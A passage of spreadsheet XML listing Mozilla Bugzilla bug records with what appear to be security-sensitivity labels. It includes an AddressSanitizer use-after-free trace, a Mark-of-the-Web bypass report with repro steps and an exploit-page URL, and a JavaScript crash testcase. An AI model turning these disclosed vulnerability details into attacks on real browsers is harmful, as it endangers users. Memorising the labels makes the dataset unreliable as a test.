    #12 0x11567b5ed in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameList&amp;)+0xcd (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb06a5ed)
    #13 0x1156597b6 in nsCSSFrameConstructor::ConstructFramesFromItemList(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList&amp;, nsContainerFrame*, bool, nsFrameList&amp;)+0x2e6 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb0487b6)
    #14 0x11565a732 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, mozilla::ComputedStyle*, nsContainerFrame*, bool, nsFrameList&amp;, bool, nsIFrame*)+0xd02 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb049732)
    #15 0x115664983 in nsCSSFrameConstructor::ConstructBlock(nsFrameConstructorState&amp;, nsIContent*, nsContainerFrame*, nsContainerFrame*, mozilla::ComputedStyle*, nsContainerFrame**, nsFrameList&amp;, nsIFrame*)+0x7f3 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb053983)
    #16 0x115660842 in nsCSSFrameConstructor::ConstructDocElementFrame(mozilla::dom::Element*)+0x2a92 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb04f842)
    #17 0x11568331b in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsCSSFrameConstructor::InsertionKind)+0x3eb (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xb07231b)
    #18 0x1155a145a in mozilla::PresShell::Initialize()+0x40a (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xaf9045a)
    #19 0x10f0f773c in nsContentSink::StartLayout(bool)+0x8bc (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x4ae673c)
    #20 0x10d768178 in nsHtml5TreeOpExecutor::StartLayout(bool*)+0x128 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x3157178)
    #21 0x10d7630ec in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**, bool*, bool*)+0x1fcc (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x31520ec)
    #22 0x10d760269 in nsHtml5TreeOpExecutor::RunFlushLoop()+0x9f9 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x314f269)
    #23 0x10d76d00f in nsHtml5ExecutorFlusher::Run()+0x3cf (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x315c00f)
    #24 0x10a9aa1e0 in mozilla::SchedulerGroup::Runnable::Run()+0x80 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x3991e0)
    #25 0x10a9b8177 in mozilla::RunnableTask::Run()+0x347 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x3a7177)
    #26 0x10a9b343a in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;)+0x107a (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x3a243a)
    #27 0x10a9b0b6e in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;)+0x2be (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x39fb6e)
    #28 0x10a9b0f67 in mozilla::TaskController::ProcessPendingMTTask(bool)+0xf7 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x39ff67)
    #29 0x10a9bf981 in mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_4&gt;::Run()+0x11 (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0x3ae981)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/zx/Documents/GitHub/codeql/codeql_cpp/chrome/browser/firefox/Nightly.app/Contents/MacOS/XUL:x86_64+0xaedb20c) in int mozilla::StyleGenericCalcNode&lt;mozilla::StyleCalcLengthPercentageLeaf&gt;::ResolveInternal&lt;int, int (*)(float)&gt;(int, int (*)(float)) const+0x66c
Shadow bytes around the buggy address:
  0x1c3200059c20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x1c3200059c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c3200059c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c3200059c50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x1c3200059c60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x1c3200059c70: fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd
  0x1c3200059c80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x1c3200059c90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x1c3200059ca0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x1c3200059cb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x1c3200059cc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29886==ABORTING
###!!! [Parent][RunMessage] Error: Channel closing: too late to send/recv, messages will be lost
```</t>
        </is>
      </c>
      <c r="X745" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="746">
      <c r="A746" t="n">
        <v>659667</v>
      </c>
      <c r="B746" t="inlineStr">
        <is>
          <t>2011-05-25 09:53:42 -0700</t>
        </is>
      </c>
      <c r="C746" t="inlineStr">
        <is>
          <t>[Tracking] Mozillians.org LDAP Directory work for 1.0</t>
        </is>
      </c>
      <c r="D746" t="inlineStr">
        <is>
          <t>2012-04-19 20:31:04 -0700</t>
        </is>
      </c>
      <c r="E746" t="n">
        <v>1</v>
      </c>
      <c r="F746" t="n">
        <v>1</v>
      </c>
      <c r="G746" t="n">
        <v>5</v>
      </c>
      <c r="H746" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I746" t="inlineStr">
        <is>
          <t>Participation Infrastructure</t>
        </is>
      </c>
      <c r="J746" t="inlineStr">
        <is>
          <t>Phonebook</t>
        </is>
      </c>
      <c r="K746" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L746" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M746" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N746" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O746" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P746" t="inlineStr">
        <is>
          <t>[qa-]</t>
        </is>
      </c>
      <c r="Q746" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R746" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S746" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T746" t="n">
        <v>1</v>
      </c>
      <c r="U746" t="n">
        <v>0</v>
      </c>
      <c r="V746" t="n">
        <v>4</v>
      </c>
      <c r="W746" t="inlineStr">
        <is>
          <t>We need to finalize the directory schema and create the automated tests for the 1.0 release.
We can file dependent bugs for specific pieces of work.</t>
        </is>
      </c>
      <c r="X746" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="747">
      <c r="A747" t="n">
        <v>1072760</v>
      </c>
      <c r="B747" t="inlineStr">
        <is>
          <t>2014-09-24 22:59:27 -0700</t>
        </is>
      </c>
      <c r="C747" t="inlineStr">
        <is>
          <t>Failed JS_ASSERT_IF(attrs &amp; JSPROP_READONLY, !(attrs &amp; (JSPROP_GETTER | JSPROP_SETTER)));</t>
        </is>
      </c>
      <c r="D747" t="inlineStr">
        <is>
          <t>2016-06-04 16:13:15 -0700</t>
        </is>
      </c>
      <c r="E747" t="n">
        <v>1</v>
      </c>
      <c r="F747" t="n">
        <v>1</v>
      </c>
      <c r="G747" t="n">
        <v>3</v>
      </c>
      <c r="H747" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I747" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J747" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K747" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L747" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M747" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N747" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O747" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P747" t="inlineStr">
        <is>
          <t>[adv-main36+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q747" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R747" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S747" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T747" t="n">
        <v>1</v>
      </c>
      <c r="U747" t="n">
        <v>0</v>
      </c>
      <c r="V747" t="n">
        <v>28</v>
      </c>
      <c r="W747" t="inlineStr">
        <is>
          <t>Created attachment 8495021
testcase
Assertion failure: !(attrs &amp; (0x10 | 0x20)), at /Users/jruderman/trees/mozilla-central/js/src/jsobj.cpp:281
This is a macro expansion of:
JS_ASSERT_IF(attrs &amp; JSPROP_READONLY, !(attrs &amp; (JSPROP_GETTER | JSPROP_SETTER)));
This assertion was added in https://hg.mozilla.org/mozilla-central/rev/49bd0c9665e5 (bug 702491) by bholley and waldo.
Security-sensitive out of caution: many JS engine invariants are safety-critical, but I don't know which ones.</t>
        </is>
      </c>
      <c r="X747" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="748">
      <c r="A748" t="n">
        <v>514769</v>
      </c>
      <c r="B748" t="inlineStr">
        <is>
          <t>2009-09-04 14:54:07 -0700</t>
        </is>
      </c>
      <c r="C748" t="inlineStr">
        <is>
          <t>Redirect policy page to new policies section</t>
        </is>
      </c>
      <c r="D748" t="inlineStr">
        <is>
          <t>2016-02-04 14:49:13 -0800</t>
        </is>
      </c>
      <c r="E748" t="n">
        <v>1</v>
      </c>
      <c r="F748" t="n">
        <v>1</v>
      </c>
      <c r="G748" t="n">
        <v>6</v>
      </c>
      <c r="H748" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I748" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J748" t="inlineStr">
        <is>
          <t>Developer Pages</t>
        </is>
      </c>
      <c r="K748" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L748" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M748" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N748" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O748" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P748" t="inlineStr"/>
      <c r="Q748" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R748" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S748" t="inlineStr">
        <is>
          <t>5.1</t>
        </is>
      </c>
      <c r="T748" t="n">
        <v>1</v>
      </c>
      <c r="U748" t="n">
        <v>0</v>
      </c>
      <c r="V748" t="n">
        <v>7</v>
      </c>
      <c r="W748" t="inlineStr">
        <is>
          <t>The policy page at /pages/policy should redirect to the hub's new policies section at /developers/docs/policies</t>
        </is>
      </c>
      <c r="X748" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="749">
      <c r="A749" t="n">
        <v>1352691</v>
      </c>
      <c r="B749" t="inlineStr">
        <is>
          <t>2017-04-01 07:02:00 -0700</t>
        </is>
      </c>
      <c r="C749" t="inlineStr">
        <is>
          <t>Address UI nits in the new AS iPad panel</t>
        </is>
      </c>
      <c r="D749" t="inlineStr">
        <is>
          <t>2017-04-11 00:29:58 -0700</t>
        </is>
      </c>
      <c r="E749" t="n">
        <v>1</v>
      </c>
      <c r="F749" t="n">
        <v>1</v>
      </c>
      <c r="G749" t="n">
        <v>2</v>
      </c>
      <c r="H749" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I749" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J749" t="inlineStr">
        <is>
          <t>Home screen</t>
        </is>
      </c>
      <c r="K749" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L749" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M749" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N749" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O749" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P749" t="inlineStr">
        <is>
          <t>[mobileAS]</t>
        </is>
      </c>
      <c r="Q749" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R749" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S749" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T749" t="n">
        <v>1</v>
      </c>
      <c r="U749" t="n">
        <v>0</v>
      </c>
      <c r="V749" t="n">
        <v>3</v>
      </c>
      <c r="W749" t="inlineStr">
        <is>
          <t>This bug will track the feedback from the new iPad design that Bryan Bell will have. 
So far here are a few issues Bryan found. 
- Favicons are not large enough. 
- Make iPhone SE sized devices also have 4 TopSites in each row instead of the current 3. 
- Empty TopSite icon silhouettes when only a few icons are available.
- Topsites/Highlights are not perfectly aligned. Each highlight should be the _exact_ width of 2 topsites.</t>
        </is>
      </c>
      <c r="X749" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="750">
      <c r="A750" t="n">
        <v>1273265</v>
      </c>
      <c r="B750" t="inlineStr">
        <is>
          <t>2016-05-16 13:56:14 -0700</t>
        </is>
      </c>
      <c r="C750" t="inlineStr">
        <is>
          <t>Firefox Mark of the Web bypass (MSVR 1533)</t>
        </is>
      </c>
      <c r="D750" t="inlineStr">
        <is>
          <t>2017-11-01 03:17:33 -0700</t>
        </is>
      </c>
      <c r="E750" t="n">
        <v>1</v>
      </c>
      <c r="F750" t="n">
        <v>1</v>
      </c>
      <c r="G750" t="n">
        <v>2</v>
      </c>
      <c r="H750" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I750" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J750" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K750" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L750" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M750" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N750" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O750" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P750" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q750" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R750" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S750" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T750" t="n">
        <v>1</v>
      </c>
      <c r="U750" t="n">
        <v>0</v>
      </c>
      <c r="V750" t="n">
        <v>64</v>
      </c>
      <c r="W750" t="inlineStr">
        <is>
          <t>Created attachment 8753042
85231FFExploit.htm
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586
Steps to reproduce:
Dan from Microsoft Vulnerability Research (MSVR) here.  We’ve found a way to bypass Mark of the Web in FireFox. I have a repro available at the following URL: http://payloadhoster.cloudapp.net/85231FFExploit.htm
(the same file is attached, but would need to be hosted somewhere along with a file to download in order to repro the issue)
To reproduce the issue:
1.	On a Windows 10 machine with Office installed, browse to the page in Firefox
2.	Click the link
3.	Select either to save the file locally, or open in PowerPoint
This vulnerability appears to be caused by links with a “download” attribute that causes the filename to be longer than what’s allowed in Windows.  It’s likely that the cause here is trying to call one Windows API or another with a string that’s too long.
Thank you for reviewing this report and we'll pass on any questions from the engineering team to the finder promptly. We look forward to hearing your team's analysis.  For our prompt attention, please email msvr@microsoft.com and reference MSVR 1533 in the title.
Actual results:
mark of the web is not applied in either case
Expected results:
mark of the web is applied and the file is open in protected view</t>
        </is>
      </c>
      <c r="X750" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="751">
      <c r="A751" t="n">
        <v>1056877</v>
      </c>
      <c r="B751" t="inlineStr">
        <is>
          <t>2014-08-21 08:37:55 -0700</t>
        </is>
      </c>
      <c r="C751" t="inlineStr">
        <is>
          <t>Merge the treeherder-ui and treeherder-service repos</t>
        </is>
      </c>
      <c r="D751" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E751" t="n">
        <v>1</v>
      </c>
      <c r="F751" t="n">
        <v>1</v>
      </c>
      <c r="G751" t="n">
        <v>7</v>
      </c>
      <c r="H751" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I751" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J751" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K751" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L751" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M751" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N751" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O751" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P751" t="inlineStr"/>
      <c r="Q751" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R751" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S751" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T751" t="n">
        <v>1</v>
      </c>
      <c r="U751" t="n">
        <v>0</v>
      </c>
      <c r="V751" t="n">
        <v>45</v>
      </c>
      <c r="W751" t="inlineStr">
        <is>
          <t>Currently, the treeherder-service Vagrantfile depends on the treeherder-ui repo out of the box - and only at a hardcoded location - which is not mentioned by the installation instructions.
There are a bunch of bugs open to make this situation better:
Bug 1045090 - Update the documentation to reflect the treeherder-ui dependency
Bug 1056865 - Vagrant: Add a local vagrant config file that is excluded by .gitignore
Bug 1056868 - Vagrant: Add ability to specify a custom directory location for treeherder-ui
Bug 1056872 - Vagrant: Change the default Vagrantfile config to not rely on the treeherder-ui repo
However, I'm wondering whether we've reached a point where it makes more sense to accept that the service and the UI are pretty closely related and so should be merged into the same repo?
IMO this would also ease development for new/less active contributors, since only one repo to clone, easier to grep for changes across both repos &amp; also impossible for incompatible ui + service changes to be made out of sync.
If we decided we were going to do this, I imagine we would:
1) Import the ui repo into treeherder-service, preserving git history &amp; using an appropriate location within the repo.
2) Update repo docs/deploy scripts/wiki pages/IT scripts and docs.
3) Delete the ui repo on Github
4) (Optionally) rename treeherder-service to treeherder.
We would unfortunately break links to treeherder-ui commits on Github, with no way to redirect (sadly one of the drawbacks of a repo not hosted by Mozilla), but I think now is the time to take the hit if we're going to do this - not later, when there's more broken URLs at stake.
What are your thoughts?</t>
        </is>
      </c>
      <c r="X751" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="752">
      <c r="A752" t="n">
        <v>34783</v>
      </c>
      <c r="B752" t="inlineStr">
        <is>
          <t>2000-04-06 02:09:32 -0700</t>
        </is>
      </c>
      <c r="C752" t="inlineStr">
        <is>
          <t>Using popup menus blows out stack</t>
        </is>
      </c>
      <c r="D752" t="inlineStr">
        <is>
          <t>2008-07-31 02:52:41 -0700</t>
        </is>
      </c>
      <c r="E752" t="n">
        <v>1</v>
      </c>
      <c r="F752" t="n">
        <v>1</v>
      </c>
      <c r="G752" t="n">
        <v>3</v>
      </c>
      <c r="H752" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I752" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J752" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K752" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L752" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M752" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N752" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O752" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P752" t="inlineStr">
        <is>
          <t>[PDT+]</t>
        </is>
      </c>
      <c r="Q752" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R752" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S752" t="inlineStr">
        <is>
          <t>M15</t>
        </is>
      </c>
      <c r="T752" t="n">
        <v>1</v>
      </c>
      <c r="U752" t="n">
        <v>0</v>
      </c>
      <c r="V752" t="n">
        <v>21</v>
      </c>
      <c r="W752" t="inlineStr">
        <is>
          <t>I just pulled a fresh M15 tip on Win98 (as of 1:30 AM on April 6).  I'm seeing 
crashes when using various popup menus.  (I'm unable to get a stack trace on 
Win98, sorry.)
Run Mozilla, open the Search sidebar panel, and choose a search category from 
the popup menu.  Mozilla will crash, apparently its blowing out the stack.
As another example, open the Bookmarks sidebar panel, select a bookmark (a real 
bookmark, not a bookmark folder or a separator), bring up a context menu and 
choose "Properties". Click on the "Schedule" tab at the top of the Properties 
window, and then choose any item from any of the popup menus.  Again, Mozilla 
will crash after blowing out the stack.
I'm guessing that there are lots of other places where using popup menus will 
crash.
This is a major regression.
Peter, I'm guessing that someone on your team gets first crack at this.</t>
        </is>
      </c>
      <c r="X752" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="753">
      <c r="A753" t="n">
        <v>526449</v>
      </c>
      <c r="B753" t="inlineStr">
        <is>
          <t>2009-11-04 03:13:23 -0800</t>
        </is>
      </c>
      <c r="C753" t="inlineStr">
        <is>
          <t>FinishSharingTitle should skip fixed slots for slow array</t>
        </is>
      </c>
      <c r="D753" t="inlineStr">
        <is>
          <t>2010-06-22 19:51:32 -0700</t>
        </is>
      </c>
      <c r="E753" t="n">
        <v>1</v>
      </c>
      <c r="F753" t="n">
        <v>1</v>
      </c>
      <c r="G753" t="n">
        <v>3</v>
      </c>
      <c r="H753" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I753" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J753" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K753" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L753" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M753" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N753" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O753" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P753" t="inlineStr">
        <is>
          <t>[sg:vector-critical addons?] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q753" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R753" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S753" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T753" t="n">
        <v>1</v>
      </c>
      <c r="U753" t="n">
        <v>0</v>
      </c>
      <c r="V753" t="n">
        <v>33</v>
      </c>
      <c r="W753" t="inlineStr">
        <is>
          <t>The following example crashes in multi-threaded shell in FinishSharingTitle:
function test() {
    function makeWorkerFn(id, bar) {
        return function() {
            bar[id] = 0;
        };
    }
    for (let i = 0; i &lt; 10; i++) {
        var bar = [];
        bar.x = 0;
        var a = [];
        for (var j = 0; j != 100; ++j)
            a.push(makeWorkerFn(j, bar));
        scatter(a);
    }
}
test();
The reason for the crash is that for the slow array FinishSharingTitle mistreats JSSLOT_ARRAY_LENGTH slot as a slot containing GC things and crashes when reinterpreting the array length, 100, as JSString.
I am not sure about severity of this bug. It cannot be triggered via the browser since even thread workers does not allow to share anything between threads. On other hand there are extensions that use threads with shared objects. For them the bug is relevant so I mark it as restricted.</t>
        </is>
      </c>
      <c r="X753" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="754">
      <c r="A754" t="n">
        <v>514505</v>
      </c>
      <c r="B754" t="inlineStr">
        <is>
          <t>2009-09-03 12:45:25 -0700</t>
        </is>
      </c>
      <c r="C754" t="inlineStr">
        <is>
          <t>SkipList Skip RtlpWaitOnCriticalSection, prepend other ntdll.dll functions to signature</t>
        </is>
      </c>
      <c r="D754" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E754" t="n">
        <v>1</v>
      </c>
      <c r="F754" t="n">
        <v>1</v>
      </c>
      <c r="G754" t="n">
        <v>4</v>
      </c>
      <c r="H754" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I754" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J754" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K754" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L754" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M754" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N754" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O754" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P754" t="inlineStr">
        <is>
          <t>[crashkill]</t>
        </is>
      </c>
      <c r="Q754" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R754" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S754" t="inlineStr">
        <is>
          <t>1.2</t>
        </is>
      </c>
      <c r="T754" t="n">
        <v>1</v>
      </c>
      <c r="U754" t="n">
        <v>0</v>
      </c>
      <c r="V754" t="n">
        <v>18</v>
      </c>
      <c r="W754" t="inlineStr">
        <is>
          <t>I was looking at RtlpWaitOnCriticalSection crashes and found a bunch of different stacks:
RtlpWaitOnCriticalSection | RtlpDeCommitFreeBlock | drwebsp.dll@0x58e1
RtlpWaitOnCriticalSection | RtlpAllocateAffinityIndex | drwebsp.dll@0x58e1
RtlpWaitOnCriticalSection | EtwEventEnabled | drwebsp.dll@0x58e1
RtlpWaitOnCriticalSection | RtlpFreeHandleForAtom | NPSWF32.dll@0x3b2cb
RtlpWaitOnCriticalSection | EtwEventEnabled | imon.dll@0x44dd
RtlpWaitOnCriticalSection | RtlQueryPerformanceFrequency | nvLsp.dll@0x5ced
RtlpWaitOnCriticalSection | RtlAddAccessAllowedAce | drwebsp.dll@0x58e1
They clearly shouldn't all be grouped under the signature "RtlpWaitOnCriticalSection".
The weird thing is that even among the drwebsp.dll@0x58e1 crashes, the second line of the stack is often different.  So maybe it would be best to skip these ntdll.dll functions (or all ntdll.dll functions?) rather than append them, so the signatures are just e.g. "drwebsp.dll@0x58e1".
(Having a fix for bug 512910 sure would be nice, too!)</t>
        </is>
      </c>
      <c r="X754" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="755">
      <c r="A755" t="n">
        <v>39524</v>
      </c>
      <c r="B755" t="inlineStr">
        <is>
          <t>2000-05-16 16:58:18 -0700</t>
        </is>
      </c>
      <c r="C755" t="inlineStr">
        <is>
          <t>process_bug.cgi doesn't check viewing permissions</t>
        </is>
      </c>
